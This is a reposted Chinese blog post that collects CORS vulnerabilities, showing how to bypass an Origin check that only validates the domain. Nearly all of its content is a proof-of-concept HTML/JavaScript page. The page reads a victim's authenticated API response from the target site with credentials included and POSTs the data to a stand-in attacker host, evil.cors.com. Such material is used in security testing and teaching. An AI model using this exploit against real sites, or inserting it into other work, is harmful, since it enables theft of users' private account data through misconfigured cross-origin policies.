码迷,mamicode.com
首页 > 其他好文 > 详细

跨域资源共享(CORS)-漏洞整理

时间:2019-07-29 00:04:55      阅读:180      评论:0      收藏:0      [点我收藏+]

标签:hid   demo   color   ==   hide   spl   cli   htm   http   

绕过 - 仅对域名校验

技术图片
#POC
#"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- 
    Credentials: true".
#Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net.
<html>
<body>
<button type=button onclick=cors()>CORS</button>
<p id=demo></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; 
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.cors.com", true);
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
View Code

 

跨域资源共享(CORS)-漏洞整理

标签:hid   demo   color   ==   hide   spl   cli   htm   http   

原文地址:https://www.cnblogs.com/AtesetEnginner/p/11261569.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!